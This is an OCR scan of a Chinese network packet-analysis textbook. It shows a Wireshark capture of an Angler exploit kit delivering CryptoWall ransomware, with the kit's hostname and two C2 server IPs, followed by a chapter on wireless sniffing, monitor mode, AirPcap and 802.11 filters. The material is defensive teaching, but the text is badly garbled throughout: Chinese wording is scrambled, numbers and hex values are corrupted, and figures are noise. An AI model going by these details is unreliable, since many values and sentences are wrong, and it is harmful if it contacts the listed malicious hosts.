是 Wireshark : Follow TCP Stream (tcp.stream eq 3) : ek_to_cryptowall4 口 XX 





GET /observation/enVjz2dtcnpz HTTP/1.1 ©@ 
Connection: Keep-Alive 

Accepts 7 

User-Agent: Mozilla/5.8 (Windows NT 6.1; WOW64; Trident/7.9;3 SLCC2; .NET CLR 2.8.50727; .NET CLR 3.5.38729; -NET 
CLR 3.8.38729; Media Center PC 6.8; rv:11.9) like Gecko 

Host: xktzjm.topcentc.top 


HTTP/1.1 288 OK 

Server: nginx/1.4.6 (Ubuntu) 

Date: Mon, @4 Jan 2816 16:26:86 GMT 
Content-Type: application/octet-stream 
Content-Length: 358488 @ 

Connection: keep-alive 

Last-Modified: Mon, 684 Jan 2916 15:56:19 GMT 
ETag: “568a9623-57866” 

Accept-Ranges: bytes 


ny ee i ee ,es 











| ey Pr FY le ea, eo pb © rt © ii RY A eh (Es 
a ee 加 
w 
1 client pktrsl 263 server pkttsl 1 turmsl 
Entire conversation (358 kB) 到 Show data as | ASCIT 下 Stream [3 3 
Find: | Find Next 








Hide this stream Print Save as... Close Help 








图 12-37 ”为 一 个 名 称奇 怪 的 文件 被 下 载 ， 其 文件 名 未 被 识别 
[一 一 


你 可 以 使 用 恶意 软件 分 析 技 术 ， 对 诉 量 数据 中 包含 的 文件 进行 解 色 和 分 析 。 如 采 你 对 和 亚 
意 软 件 赣 癌 工 程 感 兴趣 ， 我 推荐 MIchael Sikorski 和 Andrew Honig 的 《恶意 代码 分 析 实 战 》 
(2012) ， 男 一 本 No Starch Press 的 书 ， 也 是 我 个 人 最 喜欢 的 书 之 一 。 





这 个 场景 代表 了 了 最 利 见 的 恶意 软件 感染 技术 之 一 。 用 户 在 浏览 网 页 
时 ， 误 入 了 一 个 和 被 犹 洞 利 用 工具 包 插 入 了 和 亚 晶 重 定 同 代 人 码 的 网 站 。 这 些 
漏洞 利用 程序 感染 正规 网 站 ， 并 有 具备 及 集 客户 痛 指 纹 信 息 的 功能 ， 以 确 
定 客 刻 剖 存在 的 漏 将 。 被 感染 的 页 面 被 称 为 漏 凋 利 用 工具 看 陆 页 ， 它 的 
目的 征 ， 根 据 工 具 包 确定 的 用 户 系 统 存 在 的 漏洞 ， 将 用 户 客 户 闯 重 定 回 
至 为 一 个 含有 对 应 漏 凋 利 用 程序 的 站 后。 


你 刚才 看 到 的 数据 包 来 源 于 Angler 漏 洞 利 用 工具 包 ， 其 可 能 是 2015 
年 和 2016 年 最 第 见 的 工具 包 。 当 用 户 访问 一 个 被 Angler 感 染 的 网 站 时 ， 
此 工具 包 会 辨别 用 户 系 统 是 否 存在 一 个 特定 的 Flash 漏 洞 。 随 后 ， 用 户 下 
载 一 个 Flash 软 件 ， 用 户 系 统 科 感染， 用户 下 载 第 二 个 载 傈 
CryptoWall 和 恶意 软件 并 安装 。 整 个 过 程 如 图 12-38 所 示 。 





12.5 


正规 网 站 
已 被 攻击 者 支持 





1. 用 户 访问 正规 ， 
但 是 被 劫持 的 网 站 2 用 户 被 重 定向 至 漏洞 利用 工具 包 着 陆 页 。 page. 


3. 系 统 下 载 并 运行 Flash 漏 洞 利用 程序 。 







.系统 下 载 并 安 产 | 恶意 软件 。 
本 地 设备 4. 系 统 下 载 并 安装 CryptoWall 恶 意 软件 J 
L268 T22145 图 
Exploit Kit Server 
5. 恶意 软件 和 命令 与 ee 
控制 服务 器 通信 。 
Ge 图 
CryptoWall C2 服务 器 
184.170.149.44 
213.186.33.18 
图 12-38 ”漏洞 利用 工 其 包 感 染 过 程 
本 本 
小 疆 


在 本 革 ， 我 们 讲解 了 如 何在 安全 相关 的 场景 中 解析 数据 包 捕 获 、 分 


析 钟 见 攻击 撤 术 以 及 啊 应 IDS 和 警报 等 内 容 。 这 些 内 容 足 可 以 与 一 本 书 。 


而 我 们 


只 是 学 习 了 一 些 弟 用 的 扫 插 和 枚 举 类 型 、 一 种 第 见 的 中 间 和 人 攻击 


扩 术 、 两 个 如 何 利用 系统 漏 镁 的 例子 ， 以 及 一 旦 及 生 这 些 情 况 会 有 什么 
后 未 而 已。 





[1] 


被 攻击 者 控制 的 机 器 。 


详 痢 注 





第 13 草 ”无 线 网 络 数据 包 分 析 





与 传统 有 线 网 络 相 比 ， 无 线 网 络 稍微 有 些 不 同 。 虽 然 我 们 仍然 在 处 
理 TCP、 卫 等 各 见 的 通信 协议 ， 但 是 当 移 到 OSI 模型 最 展 层 时 ， 游 戏 便 
发 生 了 一 点 变化 。 在 这 里 ， 由 于 无 线 网 络 和 物理 层 的 本 质 必 性， 数据 链 
跤 层 变 得 尤为 午 要 。 这 给 我 们 捕获 和 访问 数据 增加 了 新 的 限制 。 


特大 到 这 些 笑 外 因 系 ， 你 应 该 不 会 恢 订 于 这 一 整 章 都 将 讨论 无 线 网 
络 中 的 数据 包 捕 获 和 分 析 。 本 草 我 们 将 讨论 为 什么 无 线 网 络 在 数据 包 分 
析 中 比较 特殊 ， 以 及 如 何 殉 服 这 些 困难 。 当 然 ， 我 们 会 通过 捕获 无 线 网 
络 的 实际 例子 来 进行 说 明 。 


13.1 物理 因素 


在 无 线 网 络 中 捕 著 和 分 析 传 输 数 据 ， 自 先 考 虑 的 是 物理 传输 介质 。 
到 目前 为 止 ， 我 们 痢 没 有 考虑 物理 层 ， 因 为 我 们 一 耳 在 物理 的 线 统 上 退 
信 。 现 在 我 们 通过 不 可 见 的 无 线 电波 通信 ， 数 据 包 吏 从 我 们 号 边 飞 过 。 


13.1.1 ”一 次 别 探 一 个 信道 


当 从 无 线 局 域 网 (Wireless Local Area Network，WLAN) 捕获 流量 
上 时， 最 特殊 的 喝 过 于 无 线 频 谱 是 共 吝 介质 。 不 像 有 线 网 络 的 每 个 客户 六 
都 有 它 目 己 的 网 线 连接 到 交换 机 ， 无 线 通信 的 介质 是 客户 问 共 享 的 衬 
域 。 单 个 WLAN 只 占用 802.11 频 谱 的 一 部 分 。 这 人 允许 同一 个 物理 空间 的 


多 个 系统 在 频谱 不 同 的 部 分 进行 操作 。 
BB 





无 线 网 络 的 基础 是 美国 电子 和 电气 工程 师 协 会 《Institute of Electrical and Electronics 
Engineers，IEEE)〉 开 发 的 802.11 标 准 。 整 章 涉 及 有 的 “无 线 网 络 ~“WLAN” 等 术语 均 指 802.11 标 
准 中 的 网 络 。 





空间 上 的 分 离 是 通过 将 频谱 划分 为 不 同 信 道 实现 的 。 一 个 信道 只 是 
802.11 无 线 频谱 的 一 部 分 。 在 美国 ， 有 11 个 信道 可 用 (有些 国家 允许 使 
用 更 多 的 信道 ) 。 这 是 很 重要 的 ， 因 为 WLAN 同 时 只 能 操作 一 个 信道 ， 
就 意味 着 我 们 只 能 同时 串 探 一 个 信道 ， 如 图 13-1 所 示 。 所 以 ， 如 果 你 要 
处 理 信道 6 的 WLAN， 束 必须 将 系统 配置 成 捕获 信道 6 的 流量 。 


无 线 客户 端 


] 
2 
GO 
1 
OO 
0 一 
< 叫 ---- - 7 二 
一 
OO 
OO 
-中 一 | |] 一 
无 线 频谱 














( 中 


无 线 接 入 点 
(11 信 道 ) 


图 13-1 ” 咖 探 无 线 网 络 很 及 烦 ， 因 为 同一 时 间 只 能 处 理 一 个 信道 





传统 的 无 线 噢 探 只 能 


同时 处 理 一 个 信道 ， 但 有 一 个 例外 : 茶 些 无 线 扫描 应 用 程序 使 


用 " 跳 频 ?技术 ， 可 以 迅速 改变 监听 信道 以 收集 更 多 数据 。 其 中 一 个 很 流行 的 工具 是 Kismet 可 
以 每 秒 跳 跃 10 个 信道 ， 从 而 高 效 地 串 探 多 个 信道 。 





13.1.2” 无线 信 号 干扰 


当 有 其 他 因 系 干扰 信和 扎 时 ， 无 线 通 信 不 能 你 证 空气 中 传输 的 数据 是 
完整 的 。 无 线 网 络 有 一 定 有 的 抗 干扰 特性 ， 但 并 不 完全 可 徘 。 因 此 ， 妆 从 


无 线 网 络 捕获 数据 包 时 ， 你 必须 注意 周边 环境 ， 确 保 没 有 大 的 干扰 源 ， 
比如 大 型 反映 面 、 大 块 坚 便 物 体 、 人 微波 加 、2.4GHz 无 绳 电话 、 厚 墙 面 ， 
EOE OE RI 
不 。 


同时 你 还 要 车 碟 信 着 间 干 扰 。 虽 然 同 一 时 刻 只 能 别 探 一 个 信道 ， 但 
还 是 有 些小 小 的 扎 香 : 无 线 频谱 被 分 为 多 个 不 同 的 传输 信道 ， 但 因为 频 
谱 空 间 有 限 ， 上 所 以 信道 间 有 些许 重 登 ， 如 图 13-2 所 示 。 这 和 意味 看 ， 如 末 
信和 着 4 和 信道 5 上 都 有 流量 ， 那 么 当 你 在 其 中 一 个 信 关 上 嘿 探 时 ， 会 捕获 
到 为 一 个 信 填 上 的 数据 包 。 通 第 ， 同 一 地 域 上 的 多 个 网 络 被 设置 成 使 用 
1、6 和 11 这 3 个 不 重 登 信道 ， 所 以 你 可 能 不 会 遇 到 这 个 问题 ， 但 以 防 万 
一 ， 你 还 是 要 了 解 这 是 怎么 回 事 。 


言 道 中 心 频率 (GHz) 


es 
要 





二 
$ + + + + + 
和 





重 ! |! : 
2.402 GHz 22.:MAHz 2.483 GHz 


图 13-2 ”由 于 频谱 空间 有 限 ， 信 道 之 间 有 重 靶 
13.1.3 ”检测 和 分 析 信 号 干扰 


无 线 信号 干扰 的 问题 不 是 在 Wireshark 上 观察 数据 包 就 能 解决 的 。 如 
果 你 致力 于 维护 WLAN， 那 么 就 应 该 定期 检测 信号 干扰 。 这 可 以 用 频谱 
分 析 器 来 完成 ， 它 可 以 显示 频谱 上 的 数据 或 干扰 。 


疝 业 的 频谱 分 析 鼎 价格 昂贵 ， 价 格 甚至 珊 达 数 干 关 元 ， 但 对 于 日 妆 
使 用 则 有 更 好 的 方案 。MetaGeek 开 发 了 一 个 叫 Wi-Spy 的 产品 ， 这 是 一 
个 USB 硬 件 设备 ， 用 于 监测 整个 802.11 频 谱 上 的 干扰 。 与 MetaGeek 的 
Chanalyzer 软 件 搭 配 后 ， 这 个 人 硬件 可 以 输出 图 形 化 频谱 ， 有 助 于 解决 无 
线 网 络 的 问题 。Chanalyzer 的 示例 输出 如 图 13-3 所 示 。 





图 13-3 ”这 个 Chanalyzer 显 示 同 一 地 点 有 多 个 WLAN 在 工作 


13.2 ”无线 网 卡 模式 


在 开始 咒 探 无 线 数 据 包 之 前 ， 我 们 十 要 了 解 无 线 网 卡 的 不 同 工 作 模 


Fe 
无 线 网 卡 一 共有 4 种 工作 模式 。 


锌 泄 理 株式 (Managed mode) : 当 你 的 无 线 客 刻 新 直接 与 无 线 接 
入 点 (Wireless Access Point，WAP) 连接 时 ， 束 可 以 使 用 这 个 模式 。 在 
这 个 模式 中 ， 无 线 网 卡 的 驱动 程序 依赖 WAP 和 党 理 整个 通信 过 程 。 


Ad-hoc 模 式 : 当 你 的 网 络 由 互相 直 连 的 设备 组 成 时 ， 就 可 以 使 用 这 
个 模式 。 在 这 个 模式 中 ， 无 线 通信 双方 共同 承担 WAP 的 职 贡 。 


主 模 式 (Master mode) : 一 些 局 闹 无 线 网 卡 还 支持 主 模 式 。 这 个 
模式 允许 无 线 网 卡 使 用 特制 的 驱动 程序 和 软件 工作 ， 作 为 其 他 设备 的 
WAP。 


监听 模式 〈Monitor mode) : 就 我 们 的 用 途 而 言 ， 这 古 一 个 重要 
的 模式 。 当 你 希望 无 线 客 户 问 休止 收发 数据 ， 专 心 监听 衬 气 中 的 数据 包 
时 ， 束 可 以 使 用 监听 模式 。 要 使 Wireshark 捕 获 无 线 数据 包 ， 你 的 无 线 网 
卡 和 配套 张 动 程序 必须 文 持 监听 模式 〈 也 叫 RFMON 模 式 ) 。 


大 部 分 用 户 只 使 用 无 线 网 卡 的 被 管理 俩 式 或 Ad-hoc 模 式 。 几 13-4 展 
示 了 各 种 企 式 如 何 工 作 。 


被 管理 模式 
[ (m0) [| 
Am 本 | 
2 LU [yr] LU 
无 线 客户 端 无 线 接 入 真 无 线 客户 端 
Ad-Hoc 模 式 
[ 一 一 一 ~ [ 
Ce 人 
无 线 客 户 端 无 线 客户 端 
主 模式 
[ [LL [ 
i Cm CC 
无 线 客户 端 无 线 客户 端 无 线 客户 端 
(作为 主机 ) 
监听 模式 
[CL [ 
无 线 客户 端 无 线 客户 端 
无 线 客户 端 
(正在 监听 ) 


图 13-4 不 同 的 无 线 网 卡 模式 








13.3 ”在 Windows 上 嗅 探 无 线 网 络 


即使 你 有 文 持 监听 模式 的 无 线 网 卡 ， 大 部 分 基于 Windows 的 无 线 网 
卡 驱 动 也 不 允许 你 切换 到 这 个 模式 (WinPcap 也 不 支持 这 么 做 ) 。 你 需 
要 一 些 额 外 的 便 件 来 完成 工作 。 


13.3.1 配 首 AirPcap 


AirPcap 〈 现 在 是 Riverbed 旗 下 CACE Technologies 公 司 的 产品 ) 被 
设计 用 来 突破 Windows 强 加 给 无 线 数据 包 分 析 的 限制 。AirPcap 像 U 盘 一 
样 小 巧 ， 如 图 13-5 所 示 ， 用 于 捕获 无 线 流 量 。AirPcap 使 用 第 3 草 讨论 的 
WinPcap 弛 动 和 一 个 特制 的 客户 闯 配 置 工 具 。 





图 13-5 ”AirPcap 的 设计 非常 紧 竣 ， 适 合 与 笔记 本 电脑 一 同 携带 


AirPcap 的 配置 程序 很 徐 单 ， 只 有 一 些 配置 选项 。 如 图 13-6 所 示 ， 
AirPcap 控 制 面 板 提 供 了 以 下 几 个 选项 。 


Interface: 你 可 以 在 这 里 选择 要 捕获 的 设备 。 一 些 高 级 的 分 析 场 景 
会 要 求 你 使 用 多 个 AirPcap 设 备 ， 同 步 别 探 多 个 信道 。 


Blink Led: 勾 选 这 个 复 选 框 会 使 AirPcap 设 备 上 的 LED 指 示 类 内 
烁 。 当 存在 多 个 AirPcap 设 备 时 ， 这 可 用 来 识别 正在 使 用 的 适配器 。 


Channel: 在 这 个 下 拉 有 订单 里， 你 可 以 选择 希望 AirPcap 监 昕 的 信 


Include 802.11 FCS in Frames: 默认 情况 下 ， 一 些 系 统 会 抛弃 无 线 
数据 包 的 最 后 4 个 校 验 和 比特 。 这 个 匀称 为 帆 校 验 序 列 〈EFrame Check 
Sequence，FCS) 的 校 验 和 用 来 确保 数据 包 在 传输 过 程 中 没有 人 说 破坏 。 
除非 你 有 特别 的 理由 ， 天 则 请 勾 选 这 个 复 选 框 (包含 FCS 校 验 和 ) 。 


Capture Type: 这 里 有 两 个 选项 一 一 802.11 Only 和 802.11 + Radio。 
802.11 Only 选 项 包含 标准 的 802.11 数 据 包 头 。802.11 + Radio 选 项 包含 这 
个 包头 以 及 前 问 的 radiotap 头 部 ， 因 而 包 人 额外 信息 ， 比 如 数据 鞭 、 录 
率 、 信 号 等 级 和 噪声 等 级 。 选 择 802.11 + Radio 以 观察 所 有 可 用 的 数据 

FCS Filter: 即便 你 没有 选择 Include 802.11 FCS in Frames， 这 个 选 
项 也 可 以 过 滤 FCS 认 为 已 经 被 损坏 的 数据 包 。 使 用 Valid Frames 选 项 可 以 
只 显示 FCS 认 为 成 功 接收 的 那些 数据 包 。 


WEP Configuration: 这 个 区 域 〈( 在 AirPcap Control Panel 的 Keys 选 
项 卡 可 见 〉 允 许 你 输入 所 咒 探 网 络 的 WEP 密 码 。 为 了 能 解密 WEP 加 密 
的 数据 ， 你 需要 在 这 里 填 入 正确 的 WEP 和 密码。WEP 密 码 将 在 13.9 节 中 讨 


论 。 


Rm AirPcap Control Panel * 


Settings Keys 
Interface 
SPcap USB wireless capture adapter nr OO ee Blink Led 
Model BrPcap Tx Transmit: wes hiedia: B02.11 b/g 
Basic Configuration 
Channel |2437 MHz [BG A] ee Include 5802.11 FES in Frames 
Extension Channel 0 


Capture Type | 802.11 + Radio | FEC5 Filter | ll Frames 


Help 


Reset Configuration Cancel 





图 13-6 ”AirPcap 配 置 程序 


13.3.2 ”使 用 AirPcap 捕 获 流量 


安装 并 配置 好 AirPcap 后 ， 你 应 该 对 捕获 过 程 很 熟悉 了 。 只 需要 局 
动 Wireshark 并 选择 Capture->Options。 接 着 ， 在 Interface 下 拉 框 中 选择 
AirPcap 设 备 ， 如 图 13-7 所 示 。 


帮 Wireshark . Capture Interfaces 


Input Output Options 





Link-layer Header Promiscuous Snaplen (B) Buffer (MB) Capture Filter 
802.11 plus radiotap header enabled al 2 
> Bluetooth Network Connection Ethernet enabled 
Ethern enabled 
Ethern enabled 
Etherne enabled 
Etherne enabled 
Ethern enabled 
Etherne enabled 











Enable promiscuous mode on all interfaces Manage Interfaces... 


Capture Filter for selected Interfaces: | Enter a capture filter - Compile BPFs 





图 13-7 选择 AirPcap 设 备 作 为 你 的 捕获 接口 


除了 Wireless Settings 投 钮 外 ， 拼 才 上 的 一 切 都 很 部 悉 。 单 击 这 个 投 
钮 会 给 出 与 AirPcap 配 置 程序 一 样 的 选项 ， 如 图 13-8 所 示 。AirPcap 是 完 
全 骨 入 Wireshark 的 ， 因 此 所 有 配置 都 可 以 在 Wireshark 中 修改 。 























帮 Wireshark . Wireless LAN Statistics . wireshark_pcapng_airpcap00_20160502104321_a11004 一 回 xX 
天 
BSSID Channel SSID Percent Pack, Beacons )ata pkts )be Reqs beResp Auths Deauths QOther Protection 
> 30:60:23:8f:da:c0 11 ATT2zp9x8X2 6.6 4 0 0 0 0 0 0 
> 44:el:37:2c:68:70 11 ATTz43V3c2 34.4 18 3 0 0 0 0 0 Unknown 
>》 8c:62:c4:0f:1a:4a <Broadcast> 1.6 0 0 0 0 1 0 0 
> 90:3e:ab:f0:98:80 11 ATTSC6g956 18.0 9 2 0 0 0 0 0 Unknown 
> 94:62:69:4f:4e:90 11 ATTQSKKkccl 6.6 4 0 0 0 0 0 0 
> f0:92:1c:d8:3a:d6 11 HP-Print-D6-Officejet 4630 32.8 20 0 0 0 0 0 0 
Display filter: Enter a display filter ... 








图 13-8 ”Advanced Wireless Settings 对 话 框 允许 你 在 Wireshark 中 配置 AirPcap 


一 切 都 配置 好 之 后 ， 融 可 以 单 击 Start 近 钮 开始 捕 效 数据 包 了 。 


13.4 ”在 Linux 上 咒 探 无 线 网 络 


在 Linux 系 统 响 探 只 需要 人 徐 单 地 局 用 无 线 网 卡 的 监听 模式 ， 然 后 局 


动 Wireshark 即 可 。 然 而 ， 不 同型 号 的 无 线 网 卡 司 用 监听 模式 的 流程 各 不 
相同 ， 所 以 在 这 里 我 不 能 给 出 明确 提示 。 实 际 上 上， 有些 无 线 网 卡 并 不 要 
求 你 司 用 监听 模式 。 你 最 好 Google 一 下 你 的 网 卡 型 亏 ， 确 定 是 个 需要 局 
用 它 ， 以 及 如 何 局 用 。 


在 Linux 系 统 中 ， 退 过 内 置 的 无 线 扩 展 程 序 局 用 监听 模式 是 第 用 的 
办 法 之 一 。 你 可 以 用 iwconfig 命 令 打 开 无 线 扩展 程序 。 如 末 你 在 控制 台 
上 键入 iwconfig， 应 该 会 看 到 这 样 的 结果 : 


$ iwconfig 
eth@ no wireless extensions 
1o6 no wireless extensions 
eth1 IEEE 802.11g ESSID: "Tesla Wireless Network" 
Mode:Managed Frequency:2.462 GHz Access Point:060:062:2D:8B:70:2E 


Bit Rate:54 Mb/s Tx-Power-20 dBm Sensitivity=8/06 

Retry Limit:7 RITS thr: off Fragment thr: off 

Power Management: off 

Link Quality=75/160 Signal level=-71 dBm Noise level=-86 dBm 
Rx invalid nwid:©@ Rx invalid crypt:6@ Rx invalid frag:06 

Tx excessive retries:@ Invalid misc:6 Missed beacon:2 





iwconfig 命 令 的 输出 显示 eth1l 接 口 可 以 进行 无 线 配 置 。 这 是 显然 
的 ， 因 为 它 显 示 了 与 802.11g 协 议 有 天 的 数据 ， 反 观 eth0O 和 100， 它 们 只 


妈 |9| “no wireless extensions”。 


这 个 命令 提供 了 许多 无 线 配 置信 息 ， 仔 细 看 一 下 ， 有 无 线 扩 展 服 务 
设置 ID (Extended Service Set ID，ESSID) 、 频 紊 等。 我们 注意 
到 “eth1” 下 而 一 行 显示 ， 模 式 已 经 被 设置 为 “被 害 理 ”， 这 也 束 是 我 们 想 
改动 的 地 方 。 

要 将 eth1 改 成 监听 模式 ， 你 必须 以 root 用 户 身 份 登录 。 可 以 直接 登 
录 或 用 切换 用 户 (su) 命令 ， 如 下 所 示 : 


$ su 
Password: 


在 你 成 为 root 用 户 后 ， 束 可 以 键入 命令 来 配置 无 线 网 卡 选 项 了 。 输 
入 以 下 命令 可 以 将 eth1 配 置 成 监听 模式 : 


# ijwconfig eth1 mode monitor 


网 卡 进入 监听 模式 后 ， 再 次 运行 iwconfig 命 令 应 该 能 反映 出 变化 。 
输入 以 下 命令 ， 以 确保 eth1 接 口 可 以 工作 : 


# ijwconfig eth1 up 


我 们 也 将 使 用 iwconfig 命 令 改 变 监听 信道 ， 输 入 以 下 命令 ， 改 变 
ethl1 接 口 的 信道 为 信道 3 


# iwconfig eth1 channel 3 


| 主 喜 生 时 时时 时 时 时 时 时 时 时 和 和 时 和 


你 可 以 在 捕获 数据 包 的 过 程 中 随意 修改 信道 ， 所 以 随便 改 吧 ， 没 问题 ! 也 可 以 将 
iwconfig 命 令 脚 本 化 以 人 简化 过 程 。 





完成 这 些 配 置 后 ， 请 启动 Wireshark 开 始 你 的 数据 包 捕获 之 旅 ! 
13.5”802.11 数 据 包 结构 


无 线 数 据 包 与 有 线 数 据 包 的 主要 不 同 在 于 额外 的 802.11 汰 部 。 这 是 
一 个 第 2 层 的 头 部 ， 包 含 与 数据 包 和 传输 介质 有 关 的 额外 信息 。802.11 
分 组 有 3 种 类 型 。 


管理 : 这 些 分 组 用 于 在 主机 之 间 建 立 2 层 连接 。 管 理 分 组 还 有 一 些 
重要 的 子 类 型 ， 包 括 认 证 (authentication) 、 关 联 (association) 和 信号 
(beacon) 分 组 。 


控制 : 控制 分 组 允许 管理 分 组 和 数据 分 组 的 及 达 ， 并 与 拥堵 管理 有 
天 。 常 见 的 子 类 型 包括 请 求 发 送 〈(request-to-send) 和 准予 发 送 (clear- 
to-send) 分 组 。 


数据 : 这 些 分 组 谷 有 真正 的 数据 ， 也 是 唯一 可 以 从 无 线 网 络 转 友 到 
有 线 网 络 的 数据 包 。 


一 个 无 线 数据 包 的 类 型 和 子 类 型 决定 了 它 的 结构 ， 因 此 各 种 数据 包 
结构 可 能 不 计 其 数 。 我 们 将 考 穴 其 中 一 种 结构 ， 请 看 80211beacon.pcap 


文件 里 的 单个 数据 包 。 这 个 文件 包含 一 种 叫 beacon 的 定理 数据 包 的 例 
子 ， 如 图 13-9 所 示 。 


闻 Wireshark . Packet 1 .30211beacon 


> Frame 1: 132 bytes on wire (1856 bits), 132 bytes captured (1656 bits) 
Y IEEE 862.11 Beacon frame, Flags: 
Type/Subtype: Beacon frame (8x8888) ©@O 
>》 Frame Control Field: 8x8888 
-000 0006 08080 9609 = Duration: @ microseconds 
Receiver address: Broadcast (ff:ff:ff:ff:ff:ff) 
Destination address: Broadcast (ff:ff:ff:ff:ff:ff) 
Transmitter address: D-LinkCo 8b:22:ba (88:13:46:8b:22:ba) 
和 Source address: D-LinkCo 8b:22:ba (88:13:46:8b:22:ba) 
BSS Id: D-LinkCo 6@b:22:ba (86:13:46:8b:22:ba) 
8000 = Fragment number: ® 
8181 8186 1868 .... = Sequence number: 1352 
Vv IEEE 882.11 wireless LAN management frame 
Y Fixed parameters (12 bytes) 
Timestamp: 808x888888861685a181 
Beacon Interval: 09.192469 [Seconds] 





> Capabilities Information: 8@x@431 
v Tagged parameters (96 bytes) 
: SSID parameter set: TESLA 
@ 》 Tag: Supported Rates 1(B), 2(B), 5.5(B), 11(B), 6, 12, 24, 36, [Mbit/sec] 
: DS Parameter set: Current Channel]: 11 
: Traffic Indication Map (TIM): DTIM @ of @ bitmap 
; ERP Information 





: Extended Supported Rates 9, 18, 48, 54, [Mbit/sec] 
: Vendor Specific: AtherosC: Advanced Capability 
ag: Vendor Specific: AtherosC: Unknown 
: Vendor Specific: AtherosC: extended Range 
: Vendor Specific: Globalsu 








NB 1 * Tomer WO00000 * Source’ DAinkCo Oho2rbs * Destination: Broaoe.. 1 ' Info: Bescon fame, SN=1352, FN=0, Pags=,000re BI=100, 55ID=T 





图 13-9 ”这 是 一 个 802.11 beacon 数 据 包 


beacon 是 你 能 找到 的 最 有 信息 量 的 无 线 数据 包 之 一 。 它 作为 一 个 三 
播 数 据 包 由 WAP 发 送 ， 罕 过 无 线 信道 通知 所 有 无 线 客 户 闪 存在 这 个 可 
用 的 WAP， 并 定义 了 连接 它 必 须 设置 的 一 些 参数 。 在 我 们 的 示例 文件 
中 ， 你 可 以 看 到 这 个 数据 包 在 802.11 头 部 的 Type/Subtype 域 被 定义 为 
beacon@. 

在 802.11 管 理 帆 头 部 发 现 了 其 他 信息 ， 包 插 以 下 几 点 。 

Timestamp: 发 送 数 据 包 的 时 间 稚 。 

Beacon Interval: beacon 数 据 包 重 传 间隔 。 

Capability Information: WAP 的 硬件 容量 信息 。 


SSID Parameter Set: WAP 广 播 的 SSID (网 络 名 称 ) 。 


Supported Rates: WAP 文 持 的 数据 传输 涵 。 

DS Parameter: WAP 广 播 使 用 的 信道 。 

这 个 头 部 也 包含 了 来 源 和 目的 地 址 以 及 三 商 信息 。 

在 这 些 知 识 的 基础 上 ， 我 们 可 以 了 解 到 示例 文件 中 发 迹 beacon 的 
WAP 的 很 多 人 信息。 显然 这 是 一 台 D-Link 设 备 @， 使 用 802.11b 标 准 (B) 
合 ， 在 信道 11 上 工作 @。 

虽然 802.11 管 理 数 据 包 的 其 体内 容 和 用 途 不 一 样 ， 但 总 体 结 构 跟 这 
个 例子 相 闫 不 大 。 


13.6 ”在 Packet List 面 析 增 加 无 线 专用 列 


如 你 所 见 ，Wireshark 通 常 在 Packet List 面 板 显 示 6 个 不 同 的 列 。 分 析 
无 线 数 据 包 之 前 ， 让 我 们 在 Packet List 面 板 增加 3 个 新 列 。 


。RSSI (for Received Signal Strength Indication ) 列 ， 显 示 捕 获 数据 包 

的 射频 信号 强 上 度 。 

。 TX Rate (for Transmission Rate) 列 ， 显 示 捕 获 数 据 包 的 数据 率 。 
。 Frequency/Channel 列 ， 电 示 捕 获 效 据 包 的 频 雍 和 信道 。 

当 人 处理 无 线 连 毛 时 ， 这 些 提 示 信 息 将 会 非 钙 受用 。 例 如 ， 即 使 你 的 
无 线 客户 闪 软件 千 诉 你 言 号 强度 很 棒 ， 捕获 数据 包 并 检 符 这 些 列 时 ， 也 
许 会 得 到 与 该 声明 不 从 的 数字 。 

按照 以 下 步骤 ， 在 Packet List 面 板 增加 这 些 列 。 

(1) 选择 Edit->Preferences。 
(2) 到 Columns 部 分 ， 并 单 击 Add.。 


(3) 在 Title 域 键入 RSSI， 并 在 域 类 型 下 拉 列 表 中 选择 IEEE 802.11 
RSSI。 


(4) 为 TX Rate 和 FrequencwWChannel 列 重复 此 过 程 ， 为 它们 取 个 恰 


当 的 Tile， 并 在 Field type 下 拉 列 表 选 择 IEEE 802.11 TX Rate 和 
Channel/Frequency。 洪 加 三 列 之 后 ，Preferences 狠 口 应 该 像 图 13-10 一 
样 O 〇 








K]K] K] K] KIKIKIKIKIK] a 
m 


Time (format as specified) 
Source addres 


Destination address 
Protocol 
Packet length (bytes) 


Custom 
Signal strength (dBm) Custom 
Data rate Custom 
Info Information 























图 13-10 ”在 Packet List 耐 板 增加 与 无 线 相关 的 列 
(5) 单 击 OK 使 改动 生效 。 
(6) 重启 Wireshark 以 显示 新 列 。 


13.7 “无线 专用 过 小 做 


我 们 在 第 4 章 讨 论 过 了 使 用 捕获 和 显示 过 滤器 的 好 处 。 在 有 线 网 络 
中 人 贤 选 流量 要 容易 得 多 ， 因 为 每 个 设备 有 它 目 己 的 专用 线 统 。 然 而 ， 在 
无 线 网 络 中 ， 所 有 无 线 各 户 病 产生 的 沉 量 都 同时 存在 于 共 孚 信 赴 中 ， 这 
意味 看 捕获 任意 一 个 信 建 ， 部 将 包含 几 十 个 客户 是 的 流量 。 本 市 要 讨论 
的 焦点 束 古 数据 包 过 小 各 ， 它 可 帮 你 找到 特定 沉 量 。 


13.7.1 ” 沛 选 特定 BSS ID 的 流量 


网 络 上 每 一 个 WAP 都 有 它 自 己 的 识别 名 ， 叫 作 * 基 础 服务 设备 识别 
伺 ”(Basic Service Set Identifier，BSS ID) 。 接 入 点 发 送 的 每 一 个 管理 


分 组 和 数据 分 组 都 包含 这 个 名 称 。 


一 旦 你 明确 了 想 要 查看 的 BSS ID 名 称 ， 那 么 你 需要 做 的 就 只 是 找到 
那个 WAP 发 送 的 数据 包 而 已 。Wireshark 在 Packet List 面 板 的 Info 列 里 显 
示 了 了 WAP， 因此 找到 这 个 信息 易 如 反 竺 。 


为 了 找到 感 兴 趣 的 WAP 所 传输 的 数据 包 ， 你 需要 在 802.11 汰 部 中 找 
它 的 BSS ID 域 。 过 滤器 就 基于 这 个 地 址 来 编写 。 找 到 BSS ID MAC 地 址 
后 ， 你 可 以 使 用 这 个 过 小 桥 : 


wlan.bssid == 60:11:22:33:44:55 





这 样 你 就 只 能 看 见 流 经 该 特定 WAP 的 流量 了。 
13.7.2” 饶 选 特定 的 无 线 数据 包 类 型 


在 本 半 前 面 ， 我 们 曾 讨论 过 你 可 能 在 网 络 上 看 见 的 无 线 数据 包 类 
型 。 你 通常 需要 基于 这 些 类 型 和 子 类 型 来 师 选 数据 包 。 对 于 特定 类 型 ， 
可 以 用 过 小 器 wlan.fc.type 米 实现 ， 对 于 特定 类 型 或 子 类 型 的 组 合 ， 可 以 
用 过 小 医 wc.fc.type_ subtype 来 实现 。 例 如 ， 为 了 过 小 一 个 NULL 数 据 分 
组 (在 十 六 进 制 中 是 类 型 2， 子 类 型 4) ， 你 可 以 使 用 
wlan.fc.type_subtype eq 0x24 这 个 过 小 器 。 表 13-1 提 供 了 802.11 分 组 类 型 
